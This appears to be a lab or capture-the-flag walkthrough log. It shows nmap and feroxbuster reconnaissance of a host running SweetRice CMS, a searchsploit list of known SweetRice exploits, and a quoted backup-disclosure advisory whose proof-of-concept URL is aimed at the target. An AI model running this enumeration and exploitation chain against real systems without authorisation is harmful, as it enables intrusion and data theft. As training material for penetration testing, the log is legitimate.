$ nmap -A 10.10.147.101
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
| 256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_ 256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
$ feroxbuster -u <http://10.10.147.101> -w /usr/share/wordlists/dirb/common.txt -s 200 204 301 302 307 308
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \\ \\_/ | | \\ |__
| |___ | \\ | \\ | \\__, \\__/ / \\ | |__/ |___
by Ben "epi" Risher 🤓 ver: 1.6.2
───────────────────────────┬──────────────────────
🎯 Target Url │ <http://10.10.147.101>
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/dirb/common.txt
🆗 Status Codes │ [200, 204, 301, 302, 307, 308]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/1.6.2
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
⏯ Press [ENTER] to pause|resume your scan
──────────────────────────────────────────────────
200 375l 968w 11321c <http://10.10.147.101/index.html>
301 9l 28w 316c <http://10.10.147.101/content>
301 9l 28w 319c <http://10.10.147.101/content/js>
301 9l 28w 323c <http://10.10.147.101/content/images>
200 1l 6w 1150c <http://10.10.147.101/content/images/favicon.ico>
301 9l 28w 319c <http://10.10.147.101/content/as>
301 9l 28w 324c <http://10.10.147.101/content/_themes>
200 36l 151w 2199c <http://10.10.147.101/content/index.php>
301 9l 28w 327c <http://10.10.147.101/content/attachment>
301 9l 28w 320c <http://10.10.147.101/content/inc>
301 9l 28w 322c <http://10.10.147.101/content/as/js>
301 9l 28w 332c <http://10.10.147.101/content/_themes/default>
301 9l 28w 323c <http://10.10.147.101/content/as/lib>
200 114l 252w 3678c <http://10.10.147.101/content/as/index.php>
301 9l 28w 326c <http://10.10.147.101/content/inc/cache>
301 9l 28w 336c <http://10.10.147.101/content/_themes/default/css>
301 9l 28w 325c <http://10.10.147.101/content/inc/font>
http://10.10.147.101/content/index.php
http://10.10.147.101/content/as/index.php
$ searchsploit sweetrice
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
SweetRice 0.5.3 - Remote File Inclusion | php/webapps/10246.txt
SweetRice 0.6.7 - Multiple Vulnerabilities | php/webapps/15413.txt
SweetRice 1.5.1 - Arbitrary File Download | php/webapps/40698.py
SweetRice 1.5.1 - Arbitrary File Upload | php/webapps/40716.py
SweetRice 1.5.1 - Backup Disclosure | php/webapps/40718.txt
SweetRice 1.5.1 - Cross-Site Request Forgery | php/webapps/40692.html
SweetRice 1.5.1 - Cross-Site Request Forgery / PHP Code Execution | php/webapps/40700.html
SweetRice < 0.6.4 - 'FCKeditor' Arbitrary File Upload | php/webapps/14184.txt
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
Backup Disclosure and CSRF/PHP Code Execution look interesting.
kalaratri@kali:~$ searchsploit -x php/webapps/40718.txt
Exploit: SweetRice 1.5.1 - Backup Disclosure
URL: <https://www.exploit-db.com/exploits/40718>
Path: /usr/share/exploitdb/exploits/php/webapps/40718.txt
File Type: ASCII text, with CRLF line terminators
Title: SweetRice 1.5.1 - Backup Disclosure
Application: SwtRice
Versions Affected: 1.5.1
Vendor URL: <http://www.basic-cms.org/>
Software URL: <http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip>
Discovered by: Ashiyane Digital Security Team
Tested on: Windows 10
Bugs: Backup Disclosure
Date: 16-Sept-2016
Proof of Concept :
You can access to all mysql backup and download them from this directory.
<http://localhost/inc/mysql_backup>
and can access to website files backup from:
<http://localhost/SweetRice-transfer.zip>
http://10.10.147.101/inc/mysql_backup
